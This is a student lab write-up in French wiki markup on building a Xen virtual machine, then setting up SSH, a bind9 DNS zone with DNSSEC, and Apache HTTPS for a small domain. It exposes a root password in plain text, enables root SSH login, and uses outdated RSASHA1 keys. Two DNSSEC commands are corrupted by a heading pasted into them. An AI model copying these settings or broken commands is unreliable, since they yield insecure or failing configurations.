! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
==Configuration du SSH== &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
==Configuration du DNS==&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
Note : Après avoir constaté que le serveur secondaire ne se mettait pas à jour après chaque &amp;quot;notify&amp;quot; du serveur primaire, nous avons finalement choisi d'utiliser le serveur ns1.belle-rose.site en tant que serveur secondaire. &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.local:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.local&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Nous avons séparés configuration des serveurs autorisés à dupliqué nos zones de la config de nos zones en insérant les acl suivantes dans le fichier /etc/bind/named.conf. &lt;br /&gt;
&lt;br /&gt;
 options {&lt;br /&gt;
	 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
	 dnssec-validation auto;&lt;br /&gt;
 	 dnssec-enable yes;&lt;br /&gt;
	 dnssec-lookaside auto;&lt;br /&gt;
	 listen-on-v6 { any; };&lt;br /&gt;
	 allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40; //@ de ns6.gandi.net mais plus utilisé au final&lt;br /&gt;
   193.48.57.181; //@ de ns1.belle-rose.site&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
 @       IN      SOA     ns1.paixdieu.site. postmaster.paixdieu.site. (&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.paixdieu.site.&lt;br /&gt;
 @       IN      NS      ns1.belle-rose.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.177&lt;br /&gt;
 www     IN      A       193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Pour tester le bon fonctionnement du serveur DNS, nous utilisons la commande :&lt;br /&gt;
&lt;br /&gt;
 &amp;gt;host -t any paixdieu.site localhost&lt;br /&gt;
&lt;br /&gt;
Résultat, cela fonctionne bien :&lt;br /&gt;
&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: localhost&lt;br /&gt;
 Address: 127.0.0.1#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 paixdieu.site has SOA record ns1.paixdieu.site. postmaster.paixdieu.site. 4 604800 86400 2419200 604800&lt;br /&gt;
 paixdieu.site name server ns1.belle-rose.site.&lt;br /&gt;
 paixdieu.site name server ns1.paixdieu.site.&lt;br /&gt;
&lt;br /&gt;
==HTTPS / Certificat SSL==&lt;br /&gt;
Nous avons ensuite procéder à la création des certificats SSL.&lt;br /&gt;
Nous sommes donc aller sur Gandi, acheter un certificat.&lt;br /&gt;
Pour cela nous avons généré un CSR avec la commande :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout paixdieu.site.key -out paixdieu.site.csr&lt;br /&gt;
&lt;br /&gt;
-newkey tsa:2048 permet de générer une requête CSR et une clé privée utilisant le chiffrement RSA sur 2048 bits.&lt;br /&gt;
&lt;br /&gt;
-keyout paixdieu.site.key permet de sauvegarder le fichier de clé privée sous le nom &amp;quot;paixdieu.site.key&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
-out paixdieu.csr permet de sauvegarder le fichier CSR sous le nom &amp;quot;paixdieu.csr&amp;quot;. &lt;br /&gt;
&lt;br /&gt;
Lors du paramètrage, nous avons bien fait attention à rentrer &amp;quot;paixdieu.site&amp;quot; comme common name pour que le certificat soit validé par gandi.&lt;br /&gt;
Cela se fait en copant le contenu de paixdieu.site.csr dans la fenêtre correspondante lors de l'achat du certificat.&lt;br /&gt;
&lt;br /&gt;
Afin de bien sauvegarder les fichiers utilisés, nous les avvons sauvegarder dans le dossier suivant:&lt;br /&gt;
 ~/save_dns/paixdieu.site.csr&lt;br /&gt;
 ~/save_dns/paixdieu.site.key&lt;br /&gt;
&lt;br /&gt;
'''4.4 Sécurisation de serveur DNS par DNSSEC'''&lt;br /&gt;
&lt;br /&gt;
Activer DNSSEC&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.options on ajoute les lignes :&lt;br /&gt;
 dnssec-validation yes;&lt;br /&gt;
 dnssec-enable yes;&lt;br /&gt;
 dnssec-lookaside auto;&lt;br /&gt;
&lt;br /&gt;
On crée un répertoire /etc/bind/paixdieu.site.dnssed/&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone &lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZO'''4.4 Sécurisation de serveur DNS par DNSSEC'''NE paixdieu.site&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite, on crée la clé asymétrique de la zone pour signer les enregistrements :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.key paixdieu.site-ksk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.private paixdieu.site-ksk.private&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.key paixdieu.site-zsk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.private paixdieu.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
On les inclue à la suite de /etc/bind/db.paixdieu.site&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-ksk.key&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Puis incrémente le numéro de série (5=&amp;gt;6)&lt;br /&gt;
&lt;br /&gt;
On signe des enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o paixdieu.site -k paixdie'''4.4 Sécurisation de serveur DNS par DNSSEC'''u.site-ksk ../db.paixdieu.site paixdieu.site-zsk&lt;br /&gt;
&lt;br /&gt;
Prise en compte du fichier signé&lt;br /&gt;
  &lt;br /&gt;
On modifie le fichier /etc/bind/named.conf.local de la manière suivante :&lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/db.paixdieu.site.signed&amp;quot;;&lt;br /&gt;
	allow-transfer {217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Pour finir, nous allons sur gandi.net, sur notre nom de domaine dans DNSSEC et nous ajoutons les deux clefs (zsk et ksk avec l'algorithme 5 (RSA/SHA-1).&lt;br /&gt;
Et nous vérifions la bon fonctionnement du DNSSEC de la manière suivante :&lt;br /&gt;
 &amp;gt; dnssec-verify -o paixdieu.site db.paixdieu.site.signed&lt;br /&gt;
&lt;br /&gt;
 Loading zone 'paixdieu.site' from file 'db.paixdieu.site.signed'&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms:&lt;br /&gt;
 - RSASHA1&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
&lt;br /&gt;
'''4.3 Sécurisation de site web par certificat'''&lt;br /&gt;
&lt;br /&gt;
On active le module SSL&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
On configure le port 443 pour l'HTTPS en remplaçant dans le fichier ''/etc/apache2/ports.conf'' :&lt;br /&gt;
 Listen 80&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
par&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
         Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On place paixdieu.site.key /etc/ssl/private/ et paixdieu.site.crt /etc/ssl/certs/&lt;br /&gt;
&lt;br /&gt;
On crée les liens symboliques pour les certificats&lt;br /&gt;
&lt;br /&gt;
 &amp;gt; c_rehash /etc/ssl/certs&lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 WARNING: Skipping duplicate certificate ca-certificates.crt&lt;br /&gt;
 WARNING: Skipping duplicate certificate ca-certificates.crt&lt;br /&gt;
&lt;br /&gt;
On cofigure apache en ajoutant la ligne suivante dans le fichier /etc/apache2/apache2.conf :&lt;br /&gt;
 ServerName paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On crée le fichier de configuration custom /etc/apache2/sites-available/000-paixdieu.site-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Puis nous activons le site ssl : &lt;br /&gt;
 a2ensite 000-paixdieu.site-ssl&lt;br /&gt;
&lt;br /&gt;
= Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
